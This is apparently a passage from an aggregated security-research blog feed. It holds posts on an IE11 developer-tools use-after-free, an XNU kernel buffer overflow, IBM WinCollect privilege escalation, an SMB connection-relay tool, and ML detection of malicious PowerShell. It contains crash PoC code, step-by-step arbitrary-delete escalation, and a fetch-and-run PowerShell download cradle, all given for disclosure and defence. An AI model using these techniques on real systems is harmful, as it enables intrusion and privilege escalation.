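}

The point is simply that most translations hit the small table and skip the expensive walk entirely.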


Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Crash Reproduction Series: IE Developer Console UAF

13 October 2020 at 08:50
Crash Reproduction Series: IE Developer Console UAF

During a DFIR investigation using ZecOps Crash Forensics on a developer’s computer, we encountered a consistent crash on Internet Explorer 11. The TL;DR is that although this bug is not exploitable, it presents an interesting expansion of the attack surface through the Developer Consoles on browsers.

While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.

We examined the stack trace below: 

58c0cdba     mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb
584d6ebc     mshtml!CDomEventRegistrationCallback2<CDiagnosticsElementEventHelper>::OnDOMEventListenerRemoved2+0x1a
584d8a1c     mshtml!DOMEventDebug::InvokeUnregisterCallbacks+0x100
58489f85     mshtml!CListenerAry::ReleaseAndDelete+0x42
582f6d3a     mshtml!CBase::RemoveEventListenerInternal+0x75
5848a9f7     mshtml!COmWindowProxy::RemoveEventListenerInternal+0x1a
582fb8b9     mshtml!CBase::removeEventListener+0x57
587bf1a5     mshtml!COmWindowProxy::removeEventListener+0x29
57584dae     mshtml!CFastDOM::CWindow::Trampoline_removeEventListener+0xb5
57583bb3     jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
574d4492     jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
[...more jscript9 functions]
581b0838     jscript9!ScriptEngineBase::Execute+0x9d
580b3207     mshtml!CJScript9Holder::ExecuteCallback+0x48
580b2fd3     mshtml!CListenerDispatch::InvokeVar+0x227
57fe5ad1     mshtml!CListenerDispatch::Invoke+0x6d
58194d17     mshtml!CEventMgr::_InvokeListeners+0x1ea
58055473     mshtml!CEventMgr::_DispatchBubblePhase+0x32
584d48aa     mshtml!CEventMgr::Dispatch+0x41e
584d387d     mshtml!CEventMgr::DispatchPointerEvent+0x1b0
5835f332     mshtml!CEventMgr::DispatchClickEvent+0x2c3
5835ce15     mshtml!CElement::Fire_onclick+0x37
583baa8e     mshtml!CElement::DoClick+0xd5
[...]

and noticed that the flow that led to the crash was:

  • An onclick handler fired due to user input
  • The onclick handler was executed
  • removeEventListener was called

The crash happened at:

mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb:

58c0cdcd 8b9004010000    mov     edx,dword ptr [eax+104h] ds:002b:00000104=????????

Relevant commands leading to a crash:

58c0cdc7 8b411c       mov     eax, dword ptr [ecx+1Ch]
58c0cdca 8b401c       mov     eax, dword ptr [eax+1Ch]
58c0cdcd 8b9004010000 mov     edx, dword ptr [eax+104h]

Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.

Reproduction

We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.

We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.

Summary

Tools such as the Developer Tools dynamically add complexity to the process and may open up additional attack surface.

Exploitation

Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.

Responsible Disclosure

We reported this issue to Microsoft, which decided not to fix it.

POC

Below is a small HTML page that demonstrates the concept and leads to a crash.
Tested IE11 version: 11.592.18362.0
Update Versions: 11.0.170 (KB4534251)

<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
    document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
    document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
    document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>

Interested in researching browser & OS bugs daily?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected]


ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

8 October 2020 at 10:00
ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

ZecOps is excited to announce the release of ZecOps for Mobile 2.0, which includes full support for Android. With this release, ZecOps has extended its best-in-class automatic digital forensics capabilities to the two most widespread and important mobile operating systems in the world, iOS and Android.

We see it in the news every day: sophisticated threat actors can bypass all existing security defenses, but even they make mistakes. These mistakes lead to sudden reboots, crashes, appearances in logs / OS telemetry, bugs, errors, battery loss, and other “unexplained” anomalies. ZecOps for Mobile analyzes the associated events against databases of attack techniques, common weaknesses (CWEs), and common vulnerabilities (CVEs). ZecOps’s core technology utilizes machine learning for insights, correlation, and identifying anomalous behavior for 0-day attacks. Following a quick investigation, ZecOps produces a detailed assessment of whether, when, and how a mobile device has been compromised.

World-leading governments, defense agencies, enterprises, and VIPs rely on ZecOps to automate their advanced investigations, greatly improving their threat intelligence, threat detection, APT hunting, and risk & compromise assessment capabilities. With support for Android, ZecOps can now extend this threat intelligence across an entire organization’s mobile footprint.

Supported versions:

  • Android 8 and above – until latest
  • iOS 10 and above – until latest

Supported HW Models:

  • All device models are supported on both Android and iOS.

ZecOps provides the most thorough operating system telemetry analysis as part of its advanced digital forensics. By focusing on the trails that hackers leave (“Attackers’ Mistakes”), ZecOps can provide sophisticated security organizations with critical information on the attackers’ tools, advanced persistent threats, and even discovery of attacks leveraging zero-day vulnerabilities.

.NET Grey Box Approach: Source Code Review & Dynamic Analysis

By: voidsec
7 October 2020 at 13:19

Following a recent engagement, I had the opportunity to check and verify some possible vulnerabilities on an ASP .NET application. Despite this not being the most technical nor the most innovative blog post you could find on the net, I have decided to post it anyway in order to explain the methodology I adopt to verify possible vulnerabilities. […]

The post .NET Grey Box Approach: Source Code Review & Dynamic Analysis appeared first on VoidSec.

From a comment to a CVE: Content filter strikes again!

17 September 2020 at 02:44
From a comment to a CVE: Content filter strikes again!

0x0- Opening

In the past few years XNU had a few vulns in newly added/changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision uaf, silently patched uaf), so it is no surprise that the combination of newly added code in a complex area (content-filter), alongside a funny comment, caught our attention.

0x1- Discovery story

Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:

/*
 *	TO DO LIST
 *
 *	SOONER:
 *
 *	Deal with OOB
 *
 *	LATER:
 *
 *	If support datagram, enqueue control and address mbufs as well
 */

Is this comment referring to OOB read/write issues? Probably not, but it won’t hurt to run a quick search for those. We will use the magic tool CMD+F to search for memcpy calls, and in less than two minutes you will find the following.

0x2- The bug.

The newly updated cfil_sock_attach function is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:

errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
	errno_t error = 0;
	uint32_t filter_control_unit;

	socket_lock_assert_owned(so);

	/* Limit ourselves to TCP that are not MPTCP subflows */
	if ((so->so_proto->pr_domain->dom_family != PF_INET &&
	    so->so_proto->pr_domain->dom_family != PF_INET6) ||
	    so->so_proto->pr_type != SOCK_STREAM ||
	    so->so_proto->pr_protocol != IPPROTO_TCP ||
	    (so->so_flags & SOF_MP_SUBFLOW) != 0 ||
	    (so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
		goto done;
	}

	filter_control_unit = necp_socket_get_content_filter_control_unit(so);
	if (filter_control_unit == 0) {
		goto done;
	}

	if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
		goto done;
	}
	if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
		goto done;
	}
	if (cfil_active_count == 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
		goto done;
	}
	if (so->so_cfil != NULL) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
		CFIL_LOG(LOG_ERR, "already attached");
	} else {
		cfil_info_alloc(so, NULL);
		if (so->so_cfil == NULL) {
			error = ENOMEM;
			OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
			goto done;
		}
		so->so_cfil->cfi_dir = dir;
	}
	if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
		CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
		    filter_control_unit);
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
		goto done;
	}
	CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
	    (uint64_t)VM_KERNEL_ADDRPERM(so),
	    filter_control_unit, so->so_cfil->cfi_sock_id);

	so->so_flags |= SOF_CONTENT_FILTER;
	OSIncrementAtomic(&cfil_stats.cfs_sock_attached);

	/* Hold a reference on the socket */
	so->so_usecount++;

	/*
	 * Save passed addresses for attach event msg (in case resend
	 * is needed.
	 */
	if (remote != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
	}
	if (local != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
	}

	error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
	/* We can recover from flow control or out of memory errors */
	if (error == ENOBUFS || error == ENOMEM) {
		error = 0;
	} else if (error != 0) {
		goto done;
	}

	CFIL_INFO_VERIFY(so->so_cfil);
done:
	return error;
}

We can see that in (Part A) the function receives two sockaddr parameters (local and remote) which are user controlled, and then uses their sa_len struct member (remote in (Part B) and local in (Part C)) in order to copy data to cfi_so_attach_laddr and cfi_so_attach_faddr. Parts (A), (B) and (C) were all the result of new changes in XNU.

So what’s the problem? The problem is the lack of a check on sa_len, which can be set as high as 255 and is then used in a memcpy to copy data into a union sockaddr_in_4_6, which is a 28-byte struct – resulting in a buffer overflow.

The PoC below is almost identical to Ian Beer’s mptcp PoC, with two changes. It requires a pre-requisite to reach the vulnerable area: in order to trigger the vulnerability we need an MDM-enrolled device with a NECP policy, or to attach the socket to a valid filter_control_unit. One way to do that is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.

After running the POC, it will crash the kernel:

#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, const char * argv[]) {

	int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sock < 0) {
		printf("socket failed\n");
		return -1;
	}
	printf("got socket: %d\n", sock);

	/* Oversized sockaddr with sa_len = 255, far larger than sockaddr_in_4_6 (28 bytes). */
	struct sockaddr *sockaddr_dst = malloc(256);
	memset(sockaddr_dst, 'A', 256);
	sockaddr_dst->sa_len = 255;
	sockaddr_dst->sa_family = AF_INET;

	sa_endpoint_t eps = {0};
	eps.sae_srcif = 0;
	eps.sae_srcaddr = NULL;
	eps.sae_srcaddrlen = 0;
	eps.sae_dstaddr = sockaddr_dst;
	eps.sae_dstaddrlen = 255;

	int err = connectx(sock, &eps, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);
	printf("err: %d\n", err);

	close(sock);
	return 0;
}
0x3- Patch

The patch for the issue is interesting too, because while the source code (iOS 13.6 / macOS 10.15.6) provides this patch:

	if (remote != NULL && (remote->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len);
	}
	if (local != NULL && (local->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len);
	}

The disassembly shows something else…

Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):

Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):

The panic call with the memcpy_chk is gone alongside the patch!

Did the original developer know this function was vulnerable and place the check there as a placeholder until a proper patch? Your guess is as good as ours.

Also note that the call to memcpy_chk before real_mode_bootstrap_end (which is a wrapper around memcpy) is what kept this issue from being exploitable.

0x4- What can we take from this?

  1. Read comments; they might give us valuable information.
  2. Newly added code is oftentimes buggy.
  3. Content filter code is complex and tricky.
  4. Now, with Pangu’s recent blog post and Ian Beer’s mptcp bug, we can learn that sockaddr->sa_len has already caused multiple issues and should be audited a bit more carefully.

0x5- Attacks in the wild?

This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threat intelligence database and saw no active attacks associated with this issue. We still advise updating to the latest version to receive all other updates.


IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486)

By: admin
11 September 2020 at 12:57

Summary

Assigned CVE: CVE-2020-4485 and CVE-2020-4486 have been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 13/05/2020

Exploit Code: N/A

Vendor’s Advisory: https://www.ibm.com/support/pages/node/6257885

An Elevation of Privilege (EoP) vulnerability exists in IBM QRadar WinCollect 7.2.0 – 7.2.9. The vulnerability gives a low-privileged user the ability to delete any file on the system and to disable the WinCollect service. This arbitrary delete vulnerability can be leveraged in order to gain access as NT AUTHORITY\SYSTEM. During the exploitation, the attacker disables the WinCollect service.

Description

There are two distinct root causes which can lead to the same issue (arbitrary delete):
After the installation of WinCollect, the installer remains under the folder C:\Windows\Installer. Any user with low privileges can run the installer with the following command:

msiexec /fa C:\Windows\Installer\****.msi

The WinCollect installer, although it will eventually fail when executed by a low-privileged user, will create log files under the user’s Temp folder.

At some point, the installer will try to delete those log files as SYSTEM. As long as the user controls the files in their Temp folder (C:\Users\username\AppData\Local\Temp), they can create a symlink targeting any file on the system. When the installer tries to delete these files, it will follow the symlink and perform the delete actions as SYSTEM.

Even if symlinks are mitigated in the future by Microsoft, an attacker can achieve the arbitrary delete by editing the file ~xxxx.tmp.

The file C:\Users\username\AppData\Local\Temp\~xxxx.tmp, where xxxx is a random hex value, ends with the lines:

[SearchRepalceTargetBackupFiles]
C:\Program Files\IBM\WinCollect\config\CmdLine.txt=C:\Users\attacker\AppData\Local\Temp_isFD30
C:\Program Files\IBM\WinCollect\config\logconfig_template.xml=C:\Users\attacker\AppData\Local\Temp_isFD8F
C:\Program Files\IBM\WinCollect\templates\tmplt_AgentCore.xml=C:\Users\attacker\AppData\Local\Temp_isFDAF

An attacker can edit these lines and add the files he wants to delete. For example:

[SearchRepalceTargetBackupFiles]
C:\Program Files\IBM\WinCollect\config\CmdLine.txt=C:\windows\win.ini
C:\Program Files\IBM\WinCollect\config\logconfig_template.xml=C:\Users\Admin\whatever.exe
C:\Program Files\IBM\WinCollect\templates\tmplt_AgentCore.xml=C:\Users\anotheruser\logs.txt

When we cancel the installer, these files will be deleted as SYSTEM.

As a bonus, during this process the WinCollect service stops and remains stopped until we cancel the operation.

Exploitation

In order to exploit the issue, no special program is needed.

In the following paragraph, a step by step explanation of the Video PoC is provided.

Please note that the vulnerability of IBM QRadar WinCollect ends when we delete the WER folder (or any other file/folder you want to delete).

The use of the arbitrary delete issue in order to escalate to SYSTEM is irrelevant to this vulnerability; it is an MS Windows issue. This technique has been described by Jonas L in his blog post https://secret.club/2020/04/23/directory-deletion-shell.html

The delete.exe tool is an implementation of this technique, which can be found in my GitHub repo https://github.com/DimopoulosElias/Primitives

Video PoC Step By Step


00:00-00:11: We present the environment. We are a low-privileged user, and the installer file we are going to use is 11ec43.msi. This file belongs to IBM and is the installer file of the WinCollect agent.

00:11-00:22: As a low-privileged user, we run the installer. At the end of this time frame (00:22) the WinCollect service has stopped. We can stay at this position as long as we want and perform any actions we want, with the WinCollect service being disabled (CVE-2020-4485).

00:22-00:58: We are going to use the technique presented by Jonas L in order to leverage the arbitrary delete and gain access as SYSTEM. For this to be achieved, we need to delete the folder C:\ProgramData\Microsoft\Windows\WER, which cannot be deleted by a low-privileged user. However, some sub-folders can be deleted. In this time frame, we delete the sub-folders we are able to, without any exploitation.

00:58-02:42: By exploiting CVE-2020-4486, we delete the remaining files and sub-folders from the WER folder. A low-privileged user would not be able to delete those files/folders, as we showed in the previous time frame. The $INDEX_ALLOCATION trick is used in order to delete a folder instead of a file.

02:42-03:58: We run the exploitation procedure one more time, in order to delete the C:\ProgramData\Microsoft\Windows\WER folder itself. At this point, the use of CVE-2020-4486 ends. The rest of the video presents the use of this primitive in order to escalate to SYSTEM and is irrelevant to the IBM WinCollect issues.

03:58-end: Now that we have deleted the WER folder, we use https://github.com/DimopoulosElias/Primitives in order to become SYSTEM. Again, this has nothing to do with the IBM vulnerabilities. It’s a primitive which allows us to use any (or almost any) arbitrary delete in order to escalate to SYSTEM.

We will leave the escalation with the use of symlinks as an exercise for you 🙂 .

Resources

GitHub

You can find our exploits code in our GitHub at https://github.com/RedyOpsResearchLabs/

RedyOps team

The RedyOps team uses the 0-day exploits produced by Research Labs before the vendor releases any patch. They use them in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect the marine sector are communicated to the Angel team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot beat Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malware, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are communicated to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threat monitoring and attack detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486) appeared first on REDYOPS Labs.

StreamDivert: Relaying (specific) network connections

10 September 2020 at 08:14

Author: Jelle Vergeer

The first part of this blog will be the story of how this tool found its way into existence, the problems we faced and the thought process followed. The second part will be a more technical deep dive into the tool itself, how to use it, and how it works.

Storytime

About 1½ years ago I did an awesome Red Team-like project. The project boils down to the following:

We were able to compromise a server in the DMZ region of the client’s network by exploiting a flaw in the authentication mechanism of the software that was used to manage that machine (awesome!). This machine hosted the server part of another piece of software. This piece of software basically listened on a specific port and clients connected to it – a basic client-server model. Unfortunately, we were not able to directly reach or compromise other interesting hosts in the network. We had a closer look at that service running on the machine, dumped the network traffic, and inspected it. We came to the conclusion there were actual high-value systems in the client’s network connecting to this service! So what now? I started to reverse engineer the software and came to the conclusion that the server could send commands to clients which the clients executed. Unfortunately the server did not have any UI component (it was just a service), or anything else for us to send our own custom commands to clients. Bummer! We furthermore had the restriction that we couldn’t stop or halt the service. Stopping the service meant all the clients would get disconnected, and this would actually cause quite an outage, resulting in us being detected (booh). So, to sum up:

  • We compromised a server, which hosts a server component to which clients connect.
  • Some of these clients are interesting, and in scope of the client’s network.
  • The server software can send commands to clients which clients execute (code execution).
  • The server has no UI.
  • We can’t kill or restart the service.

What now? Brainstorming resulted in the following:

  • Inject a DLL into the server to send custom commands to a specific set of clients.
  • Inject a DLL into the server and hook socket functions, and do some logic there?
  • Research if there is any Windows Firewall functionality to redirect specific incoming connections.
  • Look into the Windows Filtering Platform (WFP) and write a (kernel) driver to hook specific connections.

The first two options quickly fell off; we were too scared of messing up the injected DLL and actually crashing the server. The Windows Firewall did not seem to have any capabilities regarding redirecting specific connections from a source IP. Due to some restrictions on the ports used, the netsh redirect trick would not work for us. This left us with researching a network driver, and the discovery of an awesome open-source project: WinDivert (thanks to DiabloHorn for the inspiration). WinDivert is basically a userland library that communicates with a kernel driver to intercept network packets, sends them to the userland application where they are processed and modified, and reinjects them into the network stack. This sounds promising! We can develop a standalone userland application that depends on a well-written and tested driver to modify and re-inject packets. If our userland application crashes, no harm is done, and the network traffic continues with the normal flow. From there on, a new tool was born: StreamDivert

StreamDivert

StreamDivert is a tool to man-in-the-middle or relay incoming and outgoing network connections on a system. It has the ability to, for example, relay all incoming SMB connections to port 445 to another server, or only relay specific incoming SMB connections from a specific set of source IPs to another server. Summed up, StreamDivert is able to:

  • Relay all incoming connections to a specific port to another destination.
  • Relay incoming connections from a specific source IP to a port to another destination.
  • Relay incoming connections to a SOCKS(4a/5) server.
  • Relay all outgoing connections to a specific port to another destination.
  • Relay outgoing connections to a specific IP and port to another destination.
  • Handle TCP, UDP and ICMP traffic over IPv4 and IPv6.

Schematic inbound and outbound relaying looks like the following:

Relaying of incoming connections

Relaying of outgoing connections

Note that StreamDivert does this by leveraging the capabilities of an awesome open source library and kernel driver called WinDivert. Because packets are captured at kernel level, transported to the userland application (StreamDivert), modified, and re-injected into the kernel network stack, we are able to relay network connections regardless of whether there is anything actually listening on the local destination port.
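For a feel of what that cycle looks like, here is a minimal receive/modify/reinject sketch against the WinDivert 2.x API as I recall it (the filter string is just an example, and error handling is omitted; this is not StreamDivert's code):

#include "windivert.h"

int main(void)
{
    /* Divert inbound TCP traffic destined for port 445 (example filter). */
    HANDLE h = WinDivertOpen("inbound and tcp.DstPort == 445",
                             WINDIVERT_LAYER_NETWORK, 0, 0);
    if (h == INVALID_HANDLE_VALUE) return 1;

    unsigned char packet[WINDIVERT_MTU_MAX];
    UINT len;
    WINDIVERT_ADDRESS addr;

    while (WinDivertRecv(h, packet, sizeof(packet), &len, &addr)) {
        /* ...rewrite the destination address/port here, then fix checksums... */
        WinDivertHelperCalcChecksums(packet, len, &addr, 0);
        WinDivertSend(h, packet, len, NULL, &addr);
    }
    return 0;
}

StreamDivert itself does considerably more bookkeeping (connection tracking and NAT-style rewrites in both directions), but this capture/modify/reinject loop is the essential idea.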

The following image demonstrates the relay process where incoming SMB connections are redirected to another machine, which is capturing the authentication hashes.

Example of an SMB connection being diverted and relayed to another server.

StreamDivert source code is open-source on GitHub and its binary releases can be downloaded here.

Detection

StreamDivert (or similar tooling modifying network packets using the WinDivert driver) can be detected based on the following event log entries:

Machine learning from idea to reality: a PowerShell case study

2 September 2020 at 07:55

Detecting both ‘offensive’ and obfuscated PowerShell scripts in Splunk using Windows Event Log 4104

Author: Joost Jansen

This blog provides a ‘look behind the scenes’ at the RIFT Data Science team and describes the process of moving from a need or an idea for research towards models that can be used in practice. More specifically, it shows how known and unknown PowerShell threats can be detected using Windows event log 4104. In this case study it is shown how research into detecting offensive (with the term ‘offensive’ used in the context of ‘offensive security’) and obfuscated PowerShell scripts led to models that can be used in a real-time environment.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

Introduction to PowerShell

PowerShell plays a huge role in a lot of incidents that are analyzed by Fox-IT. During the compromise of a Windows environment almost all actors use PowerShell in at least one part of their attack, as illustrated by the vast list of actors linked to this MITRE technique [1]. PowerShell code is most frequently used for reconnaissance, lateral movement and/or C2 traffic. It lends itself to these purposes, as the PowerShell cmdlets are well-integrated with the Windows operating system and it is installed along with Windows in most recent versions.

The strength of PowerShell can be illustrated with the following example. Consider the privilege-escalation enumeration script PowerUp.ps1 [2]. Although the script itself consists of 4010 lines, it can simply be downloaded and invoked using:
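A representative cradle looks like this (the exact one-liner in the original post may have differed; the URL is reference [2]’s raw path, and Invoke-AllChecks is PowerUp’s top-level function):

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks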

In this case, the script won’t even touch the disk as it’s executed in memory. Since threat actors are aware that there might be detection capabilities in place, they often encode or obfuscate their code. For example, the command executed above can also be run base64-encoded:
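A sketch of the standard encoding step (PowerShell’s -EncodedCommand expects base64 of the UTF-16LE command; the exact snippet in the original post may have differed):

$cmd = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell.exe -EncodedCommand $b64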

which has the exact same result.

Using tools like Invoke-Obfuscation [3], the command and the script itself can be obfuscated even further. For example, the following code snippet from PowerUp.ps1

can also be obfuscated as:

These well-known offensive PowerShell scripts can already be detected by using static signatures, but small modifications in the right place will circumvent the detection. Moreover, these signatures might not detect new versions of the known offensive scripts, let alone detect new techniques. Therefore, there was an urge to create models to detect offensive PowerShell scripts regardless of their obfuscation level, as illustrated in Table 1.

Table 1: Detection of different malicious PowerShell scripts

Don’t reinvent the wheel

As we don’t want to re-invent the wheel, a literature study revealed fellow security companies had already performed research on this subject [4, 5], which was a great starting point for this research. As we prefer easily explainable classification models over complex ones (e.g. the neural networks used in the previous research) and obviously faster models over slower ones, not all parts of the research were applicable. However, large parts of the data gathering & pre-processing phase were reused while the actual features and classification method were changed.

Since detecting offensive & obfuscated PowerShell scripts are separate problems, they require separate training data. For the offensive training data, PowerShell scripts embedded in “known bad” GitHub repositories were scraped. For the obfuscated training data, parts of the Revoke-Obfuscation training data set were used [6]. An equal amount of legitimate (‘known not-obfuscated’ and “known not-offensive”) scripts were added to the training sets (retrieved from the PowerShell Gallery [7]) resulting in the training sets listed in Table 2.

Table 2: Training set sizes

To keep things simple and explainable, the decision was made to base the initial model on token (offensive) and character (obfuscated) percentages. This did require some preprocessing of the scripts (e.g. removing the comments), calculating the features, and, in the case of the offensive scripts, tokenization of the PowerShell scripts. Figures 1 & 2 illustrate how some characters and tokens are unevenly distributed among the training sets.

Figure 1: Average occurrence of several ASCII characters in obfuscated and not-obfuscated scripts
Figure 2: Average occurrence of several tokens in offensive and not-offensive scripts
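As an illustration of the character-percentage idea, here is a hedged sketch (not the team’s actual feature code; the character set is arbitrary):

from collections import Counter

def char_percentages(script: str, chars: str = "$`'\"{}+|") -> dict:
    # Fraction of the script made up of each character of interest.
    counts = Counter(script)
    total = max(len(script), 1)
    return {c: counts.get(c, 0) / total for c in chars}

print(char_percentages("IEX ('Ne' + 'w-Ob' + 'ject')"))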

The percentages were then used as features to train a supervised classification model, along with some additional features based on known-bad tokens (e.g. base64, iex and convert) and several regular expression patterns. Afterwards all features and labels were fed to our SupervisedClassification helper class, which is used in many of our projects to standardize the process of (synthetic) sampling of training data, DataFrame transformations, model selection and several other tasks. For both models, the SupervisedClassification class selected the Random Forest algorithm for the classification task. Figure 3 summarizes the workflow for the obfuscated PowerShell model.

Figure 3: High-level overview of the training process for the obfuscation model

Usage in practice

Since these models were exported, they can be used for multiple purposes by loading them in Python, feeding PowerShell scripts to them, and observing the predicted outcomes. In this example, Splunk was chosen as the platform to use this model because it is part of our Managed Detection & Response service and because of Splunk’s ability to easily run custom Python commands.

Windows is able to log blocks of PowerShell code as they are executed, called ‘PowerShell Script Block Logging’, which can be enabled via GPO or manual registry changes. The logs (identified by Windows Event ID 4104) can then be piped to a Splunk custom command Reconstruct4104Logging, which will process the script blocks back into the format the model was trained on. Afterwards, the reconstructed script is piped into e.g. the ObfuscatedPowershell custom command, which will load the pre-trained model, predict the probabilities for the scripts being obfuscated and return these predictions back to Splunk. This is shown in Figure 4.

Figure 4: Usage of the pre-trained model in Splunk along with the corresponding query
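Conceptually, the scoring step inside such a custom command boils down to something like this (the file name is hypothetical, char_percentages is the sketch above, and the model is assumed to be a persisted scikit-learn estimator):

import joblib

def score_script(script: str, model_path: str = "obfuscated_powershell.pkl") -> float:
    model = joblib.load(model_path)                  # hypothetical file name
    feats = [list(char_percentages(script).values())]
    return model.predict_proba(feats)[0][1]          # P(obfuscated)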

Performance

Back in Splunk some additional tuning can be performed (such as setting the threshold for predicting the positive class to 0.7) to reduce the number of false positives. Using cross-validation, a precision score of 0.94 was achieved, with an F1 score of 0.9, for the obfuscated PowerShell model. The performance of the offensive model is not yet as good as the obfuscated model, but since there are many parameters to tune for this model we expect this to improve in the foreseeable future. The confusion matrix for the obfuscated model is shown in Table 3.

Table 3: Confusion matrix

Despite the fact that other studies achieve even higher scores, we believe that this relatively simple and easy-to-understand model is a great first step, for which we can iteratively improve the scores over time. To finish off, these models are included in our Splunk Managed Detection Engine to check for offensive & obfuscated PowerShell scripts at a regular interval.

Conclusion and recommendation

PowerShell, despite being a legitimate and very useful tool, is frequently misused by threat actors for various malicious purposes. Using static signatures, well-known bad scripts can be detected, but small modifications may cause these signatures to be circumvented. To detect modified and/or new PowerShell scripts and techniques, more and better generic models should be researched and eventually be deployed in real-time log monitoring environments. PowerShell logging (including but not limited to the Windows Event Logs with ID 4104) can be used as input for these models. The recommendation is therefore to enable the PowerShell logging in your organization, at least at the most important endpoints or servers. This recommendation, among others, was already present in our whitepaper on ‘Managing PowerShell in a modern corporate environment‘ [8] back in 2017 and remains very relevant to this day. Additional information on other defensive measures that can be put into place can also be found in the whitepaper.

References

[1] https://attack.mitre.org/techniques/T1059/001/
[2] https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
